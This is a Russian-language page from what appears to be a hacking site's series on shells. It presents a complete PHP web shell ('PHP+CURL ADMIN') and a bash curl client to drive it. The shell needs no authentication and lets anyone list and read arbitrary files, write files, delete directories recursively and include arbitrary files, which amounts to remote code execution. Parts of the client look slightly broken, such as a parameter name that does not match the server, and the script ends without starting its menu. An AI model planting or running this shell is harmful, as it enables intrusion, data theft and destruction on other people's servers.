• Поиск
  • Кодер HEX
  • Чекер proxy
  • CSRF/XSS форма

ЦИКЛЫ СТАТЕЙ:

  • 4. SHELL
  • 4.1. ANDROID SHELL
  • 4.2. WINDOWS. КОМАНДНАЯ СТРОКА
  • 4.3. LINUX. UNIX SHELL
  • 4.4. SHELL НЕ БЕЗ METASPLOIT
  • 4.5. WEB SHELL

PHP+CURL ADMIN

Полезный минимум для того чтобы можно было загружать скрипты.

Серверная часть

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<?php
if(isset($_GET['ls'])){
    echo 'ls '.$_SERVER['DOCUMENT_ROOT'].'/ '.$_GET['ls']."\n";
    $array = scandir($_GET['ls']);
    foreach($array as $value){
        echo $value."\n";
    }
}
if(isset($_GET['cat'])){
    echo 'cat '.$_SERVER['DOCUMENT_ROOT'].'/ '.$_GET['cat']."\n";
    print(file_get_contents($_GET['cat'])."\n");
}
if(isset($_GET['echo>'])){
    echo 'echo > '.$_SERVER['DOCUMENT_ROOT'].'/ '.$_GET['echo>']."\n";
    $file_open = fopen($_GET['file_name'], 'w');
    fwrite($file_open,$_GET['echo>']);
    fclose($file_open);
}
if(isset($_GET['mkdir'])){
    mkdir($_GET['mkdir'],0777,true);
}
if(isset($_GET['rm'])){
    echo 'rm '.$_SERVER['DOCUMENT_ROOT'].'/ '.$_GET['rm']."\n";
    $file_remove = $_GET['rm'];
    if(file_exists($file_remove)){
         unlink($file_remove);
         echo 'file deleted'."\n";
    }else{
         echo 'file not found'."\n";
    }
}
if(isset($_GET['rmdir'])){
    echo 'rmdir '.$_SERVER['DOCUMENT_ROOT'].'/ '.$_GET['rmdir']."\n";
    function removeDirectory($rmdir){
        if ($objs = glob($rmdir."/*")){
            foreach($objs as $obj){is_dir($obj) ? removeDirectory($obj) : unlink($obj);}
        }
        rmdir($rmdir);
    }
    removeDirectory($_GET['rmdir']);
}
if(isset($_GET['inc'])){
    echo 'inc '.$_SERVER['DOCUMENT_ROOT'].'/ '.$_GET['inc']."\n";
    include($_GET['inc']);
}
?>

Консольная часть

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
#!/bin/bash

# FUNCTIONS
gotoMenu(){
    echo '[ url:' $address ' ]'
    echo
    echo "1 - show directory"
    echo "2 - show file content"
    echo "3 - make directory"
    echo "4 - make file"
    echo "5 - remove directory"
    echo "6 - remove file"
    echo "7 - include file"
    echo
    echo "0 - get query"
    read choice
    clear
    case "$choice" in
        1 ) showDirectory;;
        2 ) showFile;;
        3 ) makeDirectory;;
        4 ) makeFile;;
        5 ) removeDirectory;;
        6 ) removeFile;;
        7 ) includeFile;;
        0 ) getQuery;;
    esac
    gotoMenu
}
showDirectory(){
    echo "directory name:"
    read ls_dir_name
    clear
    if [ "$ls_dir_name" = "exit" ];then gotoMenu;fi
    curl -G $address'?ls='"$ls_dir_name"
    echo
    showDirectory
}
showFile(){
    echo "file name:"
    read cat_file_name
    clear
    if [ "$cat_file_name" = "exit" ];then gotoMenu;fi
    curl -G $address'?cat='"$cat_file_name"
    echo
    showFile
}
makeDirectory(){
    echo "directory name:"
    read mkdir_dir_name
    clear
    curl -G $address'?mkdir='"$mkdir_dir_name"
    echo
}
makeFile(){
    echo "file name:"
    read echo_file_name
    clear
    echo "file content:"
    read echo_file_content
    clear
    curl -G $address'?file_name='"$echo_file_name"'&echo='"$echo_file_content"
    echo
}
removeDirectory(){
    echo "directory name:"
    read rmdir_dir_name
    clear
    curl -G $address'?rmdir='"$rmdir_dir_name"
    echo
}
removeFile(){
    echo "file name:"
    read rm_file_name
    clear
    curl -G $address'?rm='"$rm_file_name"
    echo
}
includeFile(){
    echo "file name:"
    read inc_file_name
    clear
    curl -G $address'?inc='"$inc_file_name"
    echo
}
getQuery(){
    read get
    clear
    if [ "$get" = "exit" ];then gotoMenu;fi
    curl -G $address'?'$get
    getQuery
}
postQuery(){
    read post
    clear
    if [ "$post" = "exit" ];then gotoMenu;fi
    curl -d "$post"$address
    postQuery
}

# MAIN
clear

Автор: